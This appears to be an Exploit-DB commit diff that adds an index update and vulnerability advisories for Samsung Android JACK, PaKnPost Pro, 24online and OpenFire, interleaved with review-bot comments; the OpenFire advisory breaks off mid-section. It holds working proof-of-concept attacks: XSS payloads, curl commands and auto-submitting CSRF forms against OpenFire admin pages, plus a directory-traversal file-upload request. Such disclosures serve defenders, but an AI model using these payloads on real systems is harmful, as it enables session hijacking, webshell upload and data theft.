DB: 2016-07-07

9 new exploits

CIMA DocuClass ECM - Multiple Vulnerabilities
24online SMS_2500i 8.3.6 build 9.0 - SQL Injection
Linux 64bit Ncat Shellcode (SSL_ MultiChannel_ Persistant_ Fork_ IPv4/6_ Password) - 176 bytes
Advanced Webhost Billing System (AWBS) 2.9.6 - Multiple Vulnerabilities
PaKnPost Pro 1.14 - Multiple Vulnerabilities
GNU Wget < 1.18 - Arbitrary File Upload/Remote Code Execution
OpenFire 3.10.2 - 4.0.1 - Multiple Vulnerabilities
Samsung Android JACK - Privilege Escalation
Nagios XI Chained Remote Code Execution
Offensive Security 2016-07-07 05:06:28 +00:00
parent 49a443eece
commit 52cf6a3185
11 changed files with 2049 additions and 0 deletions


@ -36058,6 +36058,7 @@ id,file,description,date,author,platform,type,port
39862,platforms/multiple/dos/39862.txt,"Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap-Based Overread",2016-05-26,"Google Security Research",multiple,dos,0
39863,platforms/multiple/dos/39863.txt,"Graphite2 - NameTable::getName Multiple Heap-Based Out-of-Bounds Reads",2016-05-26,"Google Security Research",multiple,dos,0
39864,platforms/php/webapps/39864.txt,"PHP Realestate Script Script 4.9.0 - SQL Injection",2016-05-27,"Meisam Monsef",php,webapps,80
40059,platforms/php/webapps/40059.txt,"CIMA DocuClass ECM - Multiple Vulnerabilities",2016-07-06,"Karn Ganeshen",php,webapps,80
39867,platforms/multiple/dos/39867.py,"MySQL 5.5.45 - procedure analyse Function Denial of Service",2016-05-30,"Osanda Malith",multiple,dos,0
39868,platforms/php/webapps/39868.txt,"Open Source Real Estate Script 3.6.0 - SQL Injection",2016-05-30,"Meisam Monsef",php,webapps,80
39869,platforms/lin_x86-64/shellcode/39869.c,"Linux x86_64 XOR Encode execve Shellcode",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
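Review bot: the new 40059 row is inserted between ids 39864 and 39867, which breaks the ascending id order files.csv otherwise keeps (the second hunk appends 40060 through 40067 in order at the end of the file). Move the 40059 row after 40058 so id lookups and future merges stay predictable.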
@ -36229,3 +36230,11 @@ id,file,description,date,author,platform,type,port
40056,platforms/lin_x86/shellcode/40056.c,"Linux x86 TCP Bind Shell Port 4444 - 98 bytes",2016-07-04,sajith,lin_x86,shellcode,0
40057,platforms/php/webapps/40057.txt,"WebCalendar 1.2.7 - Multiple Vulnerabilities",2016-07-04,hyp3rlinx,php,webapps,80
40058,platforms/php/webapps/40058.txt,"eCardMAX 10.5 - Multiple Vulnerabilities",2016-07-04,"Bikramaditya Guha",php,webapps,80
40060,platforms/jsp/webapps/40060.txt,"24online SMS_2500i 8.3.6 build 9.0 - SQL Injection",2016-07-06,"Rahul Raz",jsp,webapps,80
40061,platforms/lin_x86-64/shellcode/40061.c,"Linux 64bit Ncat Shellcode (SSL_ MultiChannel_ Persistant_ Fork_ IPv4/6_ Password) - 176 bytes",2016-07-06,CripSlick,lin_x86-64,shellcode,0
40062,platforms/php/webapps/40062.txt,"Advanced Webhost Billing System (AWBS) 2.9.6 - Multiple Vulnerabilities",2016-07-06,"Bikramaditya Guha",php,webapps,80
40063,platforms/cgi/webapps/40063.txt,"PaKnPost Pro 1.14 - Multiple Vulnerabilities",2016-07-06,"Edvin Rustemagic, Grega Preseren",cgi,webapps,80
40064,platforms/linux/remote/40064.txt,"GNU Wget < 1.18 - Arbitrary File Upload/Remote Code Execution",2016-07-06,"Dawid Golunski",linux,remote,0
40065,platforms/jsp/webapps/40065.txt,"OpenFire 3.10.2 - 4.0.1 - Multiple Vulnerabilities",2016-07-06,Sysdream,jsp,webapps,80
40066,platforms/android/local/40066.txt,"Samsung Android JACK - Privilege Escalation",2016-07-06,"Google Security Research",android,local,0
40067,platforms/linux/remote/40067.rb,"Nagios XI Chained Remote Code Execution",2016-07-06,metasploit,linux,remote,80
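Review bot: the 40061 description uses underscores in place of commas (`SSL_ MultiChannel_ Persistant_ Fork_`) and misspells "Persistent"; the field is already double-quoted, so commas are CSV-safe and the entry would read consistently with 39869's `Linux x86_64 ...` wording as `Linux x86_64 Ncat Shellcode (SSL, MultiChannel, Persistent, Fork, IPv4/6, Password) - 176 bytes`. The 40067 description is also the only one in this hunk with no version or version range.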


platforms/android/local/40066.txt (executable file, 230 lines)

@ -0,0 +1,230 @@
Sources:
https://bugs.chromium.org/p/project-zero/issues/detail?id=796
https://bugs.chromium.org/p/project-zero/issues/detail?id=795
The usermode audio subsystem for the "Samsung Android Professional Audio" is
based on JACK, which appears to be designed for single-user usage. The common
JACK configuration on Linux systems appears to be a JACK server running under
the current user account, and interacting with JACK clients from the same user
account; so with a minimal privilege difference; this is not the case with the
configuration on Android, where the JACK service runs as a more privileged user
in a less restrictive SELinux domain to the clients that can connect to it.
The shared memory implementation (implemented by com.samsung.android.IAndroidShm
system service) allows any application to access/modify/map shared memory pages
used by JACK, regardless of which application created those shared memory pages.
(NB: This possibly results in breaking the Android permissions model and
permitting applications without the required capability to access microphone
input; this was not investigated further.)
There are multiple possible ways to corrupt the internal state of any of the
shared-memory backed c++ objects in use; attached is a PoC that uses the shared
memory service to map the JackEngineControl object in use, and modify the value
of the fDriverNum member, which is used in several places without validation.
This is highly likely not the only variable stored in shared memory that is used
without proper validation; and the function shown below is definitely not the
only place that this particular variable is used dangerously. To secure this
interface it will be necessary to review all uses of variables stored in these
shared memory interfaces.
/*!
\brief Engine control in shared memory.
*/
PRE_PACKED_STRUCTURE
struct SERVER_EXPORT JackEngineControl : public JackShmMem
{
// Shared state
jack_nframes_t fBufferSize;
jack_nframes_t fSampleRate;
bool fSyncMode;
bool fTemporary;
jack_time_t fPeriodUsecs;
jack_time_t fTimeOutUsecs;
float fMaxDelayedUsecs;
float fXrunDelayedUsecs;
bool fTimeOut;
bool fRealTime;
bool fSavedRealTime; // RT state saved and restored during Freewheel mode
int fServerPriority;
int fClientPriority;
int fMaxClientPriority;
char fServerName[JACK_SERVER_NAME_SIZE+1];
JackTransportEngine fTransport;
jack_timer_type_t fClockSource;
int fDriverNum;
bool fVerbose;
// CPU Load
jack_time_t fPrevCycleTime;
jack_time_t fCurCycleTime;
jack_time_t fSpareUsecs;
jack_time_t fMaxUsecs;
jack_time_t fRollingClientUsecs[JACK_ENGINE_ROLLING_COUNT];
unsigned int fRollingClientUsecsCnt;
int fRollingClientUsecsIndex;
int fRollingInterval;
float fCPULoad;
// For OSX thread
UInt64 fPeriod;
UInt64 fComputation;
UInt64 fConstraint;
// Timer
JackFrameTimer fFrameTimer;
#ifdef JACK_MONITOR
JackEngineProfiling fProfiler;
#endif
...
This is quite a convenient exploitation primitive, as a small negative value
will cause the code in several places to index backwards from a known array;
when (any of the similar functions to the below are called, table is pointing
to the fClientTable array inside a JackEngine instance)
void JackTransportEngine::MakeAllLocating(JackClientInterface** table)
{
for (int i = GetEngineControl()->fDriverNum; i < CLIENT_NUM; i++) {
JackClientInterface* client = table[i];
if (client) {
JackClientControl* control = client->GetClientControl();
control->fTransportState = JackTransportStopped;
control->fTransportSync = true;
control->fTransportTimebase = true;
jack_log("MakeAllLocating ref = %ld", i);
}
}
}
class SERVER_EXPORT JackEngine : public JackLockAble
{
friend class JackLockedEngine;
private:
JackGraphManager* fGraphManager;
JackEngineControl* fEngineControl;
char fSelfConnectMode;
JackClientInterface* fClientTable[CLIENT_NUM];
We can see that just behind the fClientTable, we have two pointers to other
objects; a JackEngineControl and a JackGraphManager, both of which are backed by
shared memory. Since we are treating the pointer read from table as a c++ object
with a vtable pointer, this lets us trivially gain control of the flow of
execution.
Fatal signal 11 (SIGSEGV), code 1, fault addr 0x41414140 in tid 27197 (jackd)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint: 'samsung/zeroltexx/zerolte:6.0.1/MMB29K/G925FXXU3DPAD:user/release-keys'
Revision: '10'
ABI: 'arm'
pid: 27181, tid: 27197, name: jackd >>> /system/bin/jackd <<<
AM write failed: Broken pipe
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414140
r0 f3f1a000 r1 f48c2010 r2 f48c2010 r3 41414141
r4 f3f1a000 r5 00000036 r6 f3dbf930 r7 00000078
r8 f72c8b9c r9 f6f1a308 sl f3d3f000 fp f719a991
ip f71d7a0c sp f3dbf7d8 lr f7196c43 pc 41414140 cpsr 800f0030
backtrace:
#00 pc 41414140 <unknown>
#01 pc 0003cc41 /system/lib/libjackserver.so (Jack::JackTransportEngine::MakeAllLocating(Jack::JackClientInterface**)+52)
#02 pc 0003cda1 /system/lib/libjackserver.so (Jack::JackTransportEngine::CycleEnd(Jack::JackClientInterface**, unsigned int, unsigned int)+228)
#03 pc 00048bd5 /system/lib/libjackserver.so
#04 pc 00049211 /system/lib/libjackserver.so (Jack::JackEngine::Process(unsigned long long, unsigned long long)+228)
#05 pc 000442fd /system/lib/libjackserver.so
#06 pc 00044f49 /system/lib/libjackserver.so (Jack::JackAudioDriver::ProcessGraphSyncMaster()+40)
#07 pc 00044f0d /system/lib/libjackserver.so (Jack::JackAudioDriver::ProcessGraphSync()+20)
#08 pc 00044e87 /system/lib/libjackserver.so (Jack::JackAudioDriver::ProcessSync()+94)
#09 pc 00044bbf /system/lib/libjackserver.so (Jack::JackAudioDriver::Process()+22)
#10 pc 0004fff1 /system/lib/libjackserver.so (Jack::JackThreadedDriver::Process()+24)
#11 pc 0005051f /system/lib/libjackserver.so (Jack::JackThreadedDriver::Execute()+18)
#12 pc 00040a0f /system/lib/libjackserver.so (Jack::JackAndroidThread::ThreadHandler(void*)+126)
#13 pc 0003fc53 /system/lib/libc.so (__pthread_start(void*)+30)
#14 pc 0001a38b /system/lib/libc.so (__start_thread+6)
Tombstone written to: /data/tombstones/tombstone_05
################################################################################################################
The usermode audio subsystem for the "Samsung Android Professional Audio" is
based on JACK, which appears to be designed for single-user usage. The common
JACK configuration on Linux systems appears to be a JACK server running under
the current user account, and interacting with JACK clients from the same user
account; so with a minimal privilege difference; this is not the case with the
configuration on Android, where the JACK service runs as a more privileged user
in a less restrictive SELinux domain to the clients that can connect to it.
The JACK shared memory implementation uses the struct jack_shm_info_t defined in
/common/shm.h to do some bookkeeping
PRE_PACKED_STRUCTURE
struct _jack_shm_info {
jack_shm_registry_index_t index; /* offset into the registry */
uint32_t size;
#ifdef __ANDROID__
jack_shm_fd_t fd;
#endif
union {
void *attached_at; /* address where attached */
char ptr_size[8];
} ptr; /* a "pointer" that has the same 8 bytes size when compling in 32 or 64 bits */
} POST_PACKED_STRUCTURE;
typedef struct _jack_shm_info jack_shm_info_t;
This struct is stored at the start of every JackShmAble object.
/*!
\brief
A class which objects possibly want to be allocated in shared memory derives from this class.
*/
class JackShmMemAble
{
protected:
jack_shm_info_t fInfo;
public:
void Init();
int GetShmIndex()
{
return fInfo.index;
}
char* GetShmAddress()
{
return (char*)fInfo.ptr.attached_at;
}
void LockMemory()
{
LockMemoryImp(this, fInfo.size);
}
void UnlockMemory()
{
UnlockMemoryImp(this, fInfo.size);
}
};
This means that whenever the JACK server creates an object backed by shared
memory, it also stores a pointer to that object (in the address space of the
JACK server), allowing a malicious client to bypass ASLR in the JACK server
process.
The PoC provided for the other reported JACK issue uses this to bypass ASLR in
the JACK server process.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40066.zip
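Review bot: the advisory states no affected-version range and no fix status; the only version data is the build fingerprint inside the crash dump (`samsung/zeroltexx/zerolte:6.0.1/MMB29K/G925FXXU3DPAD`) and there is no CVE in a header, so a defender cannot map this entry to a patch level. The other text files in this commit (40060.txt, 40063.txt) carry `# Version:` and `# Tested on:` headers; this one should too. The second half, from the `####` separator on, repeats the opening JACK paragraph verbatim because two Project Zero issues (795 and 796, per the Sources URLs) were concatenated; a one-line label naming the issue at the start of each part would make the boundary explicit. A short Remediation section would also help, since the text already spells out the fix direction: validate fDriverNum and every other field read from client-writable shared memory before use, and do not let arbitrary apps map JACK's shared-memory pages through the IAndroidShm service.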

platforms/cgi/webapps/40063.txt (executable file, 91 lines)

@ -0,0 +1,91 @@
# Exploit Title: PaKnPost Pro Arbitrary File Upload & Remote Code Execution
# Date: 2016-07-06
# Product: PaKnPost Pro
# Vendor Homepage: http://www.paknpost.org
# Software Link: https://sourceforge.net/projects/paknpost/
# Version: <=1.14
# Tested on: Windows, Linux
# Exploit Authors: Edvin Rustemagic, Grega Preseren
# Contacts: https://www.linkedin.com/in/edvinrustemagic - https://si.linkedin.com/in/gregapreseren
===========
Description
===========
File extension check bypass and directory traversal lead to uploading an arbitrary file to an unintended directory and remote code execution.
=======
Details
=======
File extension check can be bypassed by using two extensions, out of which one must be allowed (select_.cgi:368).
Directory traversal vulnerability exists in the GET parameter sid, where no validation checks are made (select_.cgi:204).
Exploitation of these two vulnerabilities allows an attacker to upload a webshell to an executable directory and gain command line access to the server. Windows deployments turned out to be more likely exploitable with a consequence of gaining SYSTEM privileges.
========
Timeline
========
2016-03-15 Vulnerability discovered at customer's deployment.
2016-06-13 PoC completed for Linux and Windows platforms.
2016-06-13 Author/Maintainer at SourceForge has been notified.
2016-06-21 Patch written and delivered to Author/Maintainer.
2016-06-23 Patch publicly released.
2016-07-06 Exploit submitted to Exploit-DB.
=======================
Windows PoC Environment
=======================
- Windows Server 2003 R2 SP2
- Apache 2.2.10
- ActivePerl 5.8.0.806
=====================
Linux PoC Environment
=====================
- Debian 8.3
- Apache 2.4.10
- Perl 5.20.2
=======
Exploit
=======
1. File upload GET parameter 'sid' can be exploited in order to upload an arbitrary file to an unintended executable directory.
2. File upload multipart POST parameter 'filename' can include two extensions to bypass file extension check.
For example:
POST /cgi-bin/pnp/select_.cgi?sid=../../../cgi-bin/ HTTP/1.1
Host: paknpost
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://paknpost/cgi-bin/pnp/select.cgi
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------6077763223847
Content-Length: 6087
-----------------------------6077763223847
Content-Disposition: form-data; name="file[1]"; filename="pnp-test.txt.cgi"
Content-Type: application/octet-stream
==============
Solution/Patch
==============
a. Update to version 1.15
b. Or apply the following patch:
--- select_.cgi.ORIG 2016-03-29 22:56:40.868000000 +0200
+++ select_.cgi 2016-06-14 10:18:37.864000000 +0200
@@ -201,6 +201,9 @@
}
# Create the new Holding Area
+if ($sessionid =~ m/[^\w]/) {
+ &error(file_write);
+}
$user_dir = $upload_dir.$sessionid;
if (-d "$user_dir")
{
@@ -365,7 +368,7 @@
if ($file_check)
{
# Exclude all except acceptable file extensions as a fist cut to file checks
- unless (grep($fhl =~ /$_/, @allowed_ext)) { $debug1 = "Failed"; &show_file_not_allowed; }
+ unless (grep($fhl =~ /$_$/, @allowed_ext)) { $debug1 = "Failed"; &show_file_not_allowed; }
$debug1 = "Passed";
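Review bot: in the second hunk of the embedded patch, `$_` is still interpolated unescaped into the regex (`/$_$/`), so any metacharacter in an @allowed_ext entry (a leading dot, for instance) keeps its regex meaning. Anchoring the end does close the double-extension bypass in the PoC (`pnp-test.txt.cgi` no longer matches an allowed `txt`), but `/\Q$_\E$/` (or `quotemeta`) plus an explicit leading `\.` would make the comparison literal and exact. In the first hunk, `m/[^\w]/` on `$sessionid` rejects `../`, but `\w` is locale- and Unicode-aware in Perl, so an explicit allow-list such as `m/^[A-Za-z0-9_]+$/` states the intent more clearly; and `&error(file_write)` passes a bareword where a quoted string is presumably intended (it would not compile under `use strict`). The PoC request body is cut off after the `Content-Type` part header even though `Content-Length: 6087` is declared; a note saying the body is truncated on purpose would avoid readers treating it as a complete request.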

platforms/jsp/webapps/40060.txt (executable file, 22 lines)

@ -0,0 +1,22 @@
# Exploit Title: SQL Injection In 24 Online Billing API
# Date: 03/07/2016
# Exploit Author: Rahul Raz
# Vendor Homepage: http://24onlinebilling.com
# Software Name:24online Model SMS_2500i
# Version: 8.3.6 build 9.0
# Tested on: Ubuntu Linux
Potentially others versions older than this are vulnerable too.
Vulnerability type: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The invoiceid GET parameter on <base url>/24online/webpages/myaccount/usersessionsummary.jsp in not filtered properly and leads to SQL Injection
Authentication Required: Yes
A non-privileged authenticated user can inject SQL commands on the <base-url>/24online/webpages/myaccount/usersessionsummary.jsp?invoiceid=<numeric-id> &fromdt=dd/mm/yyyy hh:mm:ss&todt= dd/mm/yyyy hh:mm:ss
There is complete informational disclosure over the stored database.
I tried to contact them to disclose and get the vulnerability patched, but they did not reply positively.
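Review bot: the `# Date:` header uses `03/07/2016`, which is ambiguous (3 July or 7 March) next to the ISO `2016-07-06` date in files.csv; use the ISO form. The advisory names no fix or workaround (the closing line only says the vendor did not reply) and no CVE, and the vulnerable URL is written once as `<base url>` and once as `<base-url>` with a stray space before `&fromdt`. Since `invoiceid` is described as numeric, a one-line remediation (cast to integer or use a parameterized query in the JSP) would give administrators something actionable. "in not filtered" should read "is not filtered".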

platforms/jsp/webapps/40065.txt (executable file, 681 lines)

@ -0,0 +1,681 @@
# Several vulnerabilities doscovered in OpenFire version 3.10.2 to 4.0.1
## Product Description
**OpenFire** is an opensource project under GNU GPL licence. It provides a Jabber/XMPP server fully develloped in Java. It's develloped by the **Ignite realtime** community.
The actual version of the product is 4.0.2.
Official web site : http://igniterealtime.org/
Several vulnerabilities have been discovered between 2015, October and 2016, February.
Reported vulnerabilities are similar to those previously discovered by hyp3rlinx, although they concern different pages.
In brief, the flaws are of the following kinds: CSRF, XSS (reflected and stored), file upload and information disclosure. Most vulnerabilities need an administration access to the web application and may lead to personal information leakage or account take-over.
**Ingnite realtime** fixed some vulnerabilities (the corresponding commit ID are indicated in this document).
## Several Relected XSS Vulnerabilities identified in Openfire 3.10.2
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-79
**CVSS Base Score**: 5.2
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N/E:F/RL:O
### Vulnerability Description
Several XSS vulnerabilities have been found on several pages of the administration panel. Reflected XSS may lead to session hijacking on admin user.
### Proof of Concept
#### *domain* and *remotePort* variables from *server2server-settings.jsp*
The following POST values can be sent to trigger the vulnerability:
```
domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&remotePort=5269&serverAllowed=Add+Server
```
or
```
domain=testt&remotePort=5269%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverAllowed=Add+Server
```
or
```
domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverBlocked=Block+Server
```
You can reproduce the exploitation with the following curl commands:
```
curl --data "domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&remotePort=5269&serverAllowed=Add+Server" https://OpenFireServerIP:9090/server2server-settings.jsp --cookie="JSESSIONID=XXX"
curl --data "domain=test&remotePort=5269%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverAllowed=Add+Server" https://OpenFireServerIP:9090/server2server-settings.jsp --cookie="JSESSIONID=XXX"
curl --data "domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverBlocked=Block+Server" https://OpenFireServerIP:9090/server2server-settings.jsp --cookie="JSESSIONID=XXX"
```
#### *criteria* variable from *plugins/search/advance-user-search.jsp*
The following GET request exploits the XSS vulnerability:
```
http://OpenFireServerIP:9090/[[http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search
```
## Several stored XSS Vulnerabilities identified in Openfire 3.10.2
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-79
**CVSS Base Score**: 5.5
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O
### Vulnerability Description
Several XSS vulnerabilities have been found on several pages of the administration panel. Stored XSS could lead to session hijacking on admin user.
### Proof of Concept
#### *mucdesc* variable from *muc-service-edit-form.jsp*
The following POST values can be sent to trigger the vulnerability:
```
save=true&mucname=test&mucdesc=test%22%2F%3E%3Cscript%3Ealert%28%27XSS-2%27%29%3C%2Fscript%3E
```
The following code allows the creation of a web frame exploiting the vulnerability:
```
<iframe style="display:none" name="xss-frame"></iframe>
<form id="xss-form" action="http://OpenFireServerIP:9090/muc-service-edit-form.jsp" >
<input type="text" name="save" value="true" >
<input type="text" name="mucname" value="test" >
<input type="text" name="mucdesc" value="%22/><script>alert('XSS')</script>" >
</form>
<script>document.getElementById("xss-form").submit()</script>
```
or with this curl command:
```
curl --data "save=true&mucname=test&mucdesc=test%22%2F%3E%3Cscript%3Ealert%28%27XSS-2%27%29%3C%2Fscript%3E" https://OpenFireServerIP:9090/muc-service-edit-form.jsp --cookie="JSESSIONID=XXX"
```
#### *searchname* variable from *plugins/search/search-props-edit-form.jsp*
The following POST values can be sent to trigger the vulnerability:
```
searchEnabled=true&searchname=search%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupOnly=false
```
The following code allows the creation of a web frame exploiting the vulnerability:
```
<iframe style="display:none" name="xss-frame"></iframe>
<form id="xss-form" action="http://OpenFireServerIP:9090/plugins/search/search-props-edit-form.jsp?save" method="post" target="xss-frame" >
<input type="text" name="searchEnabled" value="true" >
<input type="text" name="searchname" value="search%22/><script>alert('XSS')</script>" >
<input type="text" name="groupOnly" value="false" >
</form>
<script>document.getElementById("xss-form").submit()</script>
```
or with this curl command:
```
curl "http://OpenFireServerIP:9090/plugins/search/search-props-edit-form.jsp" --data="searchEnabled=true&searchname=%22/%3E%3Cscript%3Ealert('XSS')%3C/script%3E&groupOnly=false" --cookie="JSESSIONID=XXX"
```
#### *searchname* variable from *page plugins/search/search-props-edit-form.jsp*
The following POST values can be sent to trigger the vulnerability:
```
propName=adminConsole.port&propValue=9090%22+onmouseover%3D%22alert%28%27xxs%27%29%22+x%3D%22&encrypt=false&save=Save+Property
```
The following code allows the creation of a web frame exploiting the vulnerability:
```
<iframe style="display:none" name="xss-frame"></iframe>
<form id="xss-form" action="http://OpenFireServerIP:9090/server-properties.jsp" method="post" target="xss-frame" >
<input type="text" name="propValue" value="=adminConsole.port" >
<input type="text" name="searchname" value="9090%22 onmouseover=%22alert('XSS')%22 x="/>
<input type="text" name="encrypt" value="false" >
<input type="text" name="save" value="Save Property" >
</form>
<script>document.getElementById("xss-form").submit()</script>
```
or with this curl command:
```
curl --data "searchEnabled=true&searchname=search%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupOnly=false" https://OpenFireServerIP:9090/plugins/search/search-props-edit-form.jsp --cookie="JSESSIONID=XXX"
```
#### *serverName* variable from *plugins/search/search-props-edit-form.jsp*
The following POST values can be sent to trigger the vulnerability:
```
serverName=localhost.localdomain%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverPort=5269&componentPort=5275&port=5222&sslEnabled=true&sslPort=5223&embeddedPort=9090&embeddedSecurePort=9091&jmxEnabled=false&jmxSecure=true&jmxPort=1099&save=Save+Properties
```
The following code allows the creation of a web frame exploiting the vulnerability:
```
<iframe style="display:none" name="xss-frame"></iframe>
<form id="xss-form" action="http://OpenFireServerIP:9090/server-props.jsp" method="post" target="xss-frame" >
<input type="text" name="serverName" value="localhost.localdomain%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E" >
<input type="text" name="serverPort" value="5269" >
<input type="text" name="componentPort" value="5275" >
<input type="text" name="port" value="5222" >
<input type="text" name="sslEnabled" value="true" >
<input type="text" name="sslPort" value="5223" >
<input type="text" name="embeddedPort" value="9090" >
<input type="text" name="embeddedSecurePort" value="9091" >
<input type="text" name="jmxEnabled" value="false" >
<input type="text" name="jmxSecure" value="true" >
<input type="text" name="jmxPort" value="1099" >
<input type="text" name="save" value="Save+Properties" >
</form>
<script>document.getElementById("xss-form").submit()</script>
```
or with this curl command:
```
curl --data "serverName=localhost.localdomain%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverPort=5269&componentPort=5275&port=5222&sslEnabled=true&sslPort=5223&embeddedPort=9090&embeddedSecurePort=9091&jmxEnabled=false&jmxSecure=true&jmxPort=1099&save=Save+Properties" https://OpenFireServerIP:9090/server-props.jsp --cookie="JSESSIONID=XXX"
```
### Affected versions
* Version >= 3.10.2 and < 4.0.0
## Several Relected XSS Vulnerabilities identified in Openfire 4.0.0 and 4.0.1
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-79
**CVSS Base Score**: 5.2
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N/E:F/RL:O
### Vulnerability Description
Several XSS vulnerabilities have been found on several pages of the administration panel. Reflected XSS could lead to session hijacking against an administrator.
Some of these vulnerabilities have already been found by hyp3rlinx, but had not been patched properly.
### Proof of Concept
#### *groupchatName*, *groupchatJID*, *users* and *groups* variables from *page create-bookmark.jsp* suffer from the vulnerability
The following POST values can be sent to trigger the vulnerability:
```
groupchatName=%22%3E%3Cscript%3Ealert%28%27XSS1%27%29%3C%2Fscript%3E&groupchatJID=%22%3E%3Cscript%3Ealert%28%27XSS2%27%29%3C%2Fscript%3E%C2%B2&users=%22%3E%3Cscript%3Ealert%28%27XSS3%27%29%3C%2Fscript%3E&groups=%22%3E%3Cscript%3Ealert%28%27XSS4%27%29%3C%2Fscript%3E&createGroupchatBookmark=Create&type=groupchat
```
The following curl command allows reproducing the attack against the Openfire *plugins/bookmarks/create-bookmark.jsp* page:
```
curl --data "save=true&mucname=conference&mucdesc=Public+Chatrooms%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E" https://OpenFireServerIP:9090/muc-service-edit-form.jsp --cookie="JSESSIONID=XXX"
```
#### *search* variable from *group-summary.jsp*
The following GET request exploit the XSS vulnerability:
```
http://OpenFireServerIP:9090/group-summary.jsp?search=test%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22
```
The following curl command allows reproducing the attack against the Openfire *group-summary.jsp* page.
```
curl http://OpenFireServerIP:9090/group-summary.jsp?search=test%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22 --cookie="JSESSIONID=XXX"
```
#### *maxTotalSize*, *maxFileSize*, *maxDays*, *logTimeout* variables from *audit-policy.jsp*
The following GET request exploit the XSS vulnerability:
```
http://OpenFireServerIP:9090/audit-policy.jsp?auditEnabled=false&logDir=%2Fopt%2Fopenfire%2Flogs&maxTotalSize=1000%22%3E%3Cscript%3Ealert%28%27XSS3%27%29%3C%2Fscript%3E&maxFileSize=10%22%3E%3Cscript%3Ealert%28%27XSS4%27%29%3C%2Fscript%3E&maxDays=-1%22%3E%3Cscript%3Ealert%28%27XSS5%27%29%3C%2Fscript%3E&logTimeout=120%22%3E%3Cscript%3Ealert%28%27XSS6%27%29%3C%2Fscript%3E&ignore=&update=Save+Settings
```
The following curl command allows reproducing the attack against the Openfire *audit-policy.jsp* page:
```
curl "http://OpenFireServerIP:9090/audit-policy.jsp?auditEnabled=false&logDir=%2Fopt%2Fopenfire%2Flogs&maxTotalSize=1000%22%3E%3Cscript%3Ealert%28%27XSS3%27%29%3C%2Fscript%3E&maxFileSize=10%22%3E%3Cscript%3Ealert%28%27XSS4%27%29%3C%2Fscript%3E&maxDays=-1%22%3E%3Cscript%3Ealert%28%27XSS5%27%29%3C%2Fscript%3E&logTimeout=120%22%3E%3Cscript%3Ealert%28%27XSS6%27%29%3C%2Fscript%3E&ignore=&update=Save+Settings" --cookie="JSESSIONID=XXX"
```
#### *passPhrase* variables from *import-keystore-certificate.jsp*
The following POST values exploit the XSS vulnerability:
```
passPhrase=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&privateKey=test&certificate=test&save=Save
```
The following curl command allows reproducing the attack against the Openfire *import-keystore-certificate.jsp* page.
```
curl http://OpenFireServerIP:9090/import-keystore-certificate.jsp --data="passPhrase=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&privateKey=test&certificate=test&save=Save" --cookie="JSESSIONID=XXX"
```
#### *criteria* variable from */plugins/search/advance-user-search.jsp*
The following GET request exploit the XSS vulnerability:
```
http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search
```
The following curl command allows reproducing the attack against the Openfire *plugins/search/advance-user-search.jsp* admin page.
```
curl "http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search" --cookie="JSESSIONID=XXX"
```
### Affected versions
* Version 4.0.0 and 4.0.1
## Several stored XSS Vulnerabilities identified in Openfire 4.0.0 and 4.0.1
Some of these vulnerabilities have already been found by hyp3rlinx, but has not been patched since.
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-79
**CVSS Base Score**: 5.5
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O
### Vulnerability Description
Several XSS vulnerabilities have been found on several pages of the administration panel. Stored XSS could lead to session hijacking on admin user.
### Proof of Concept
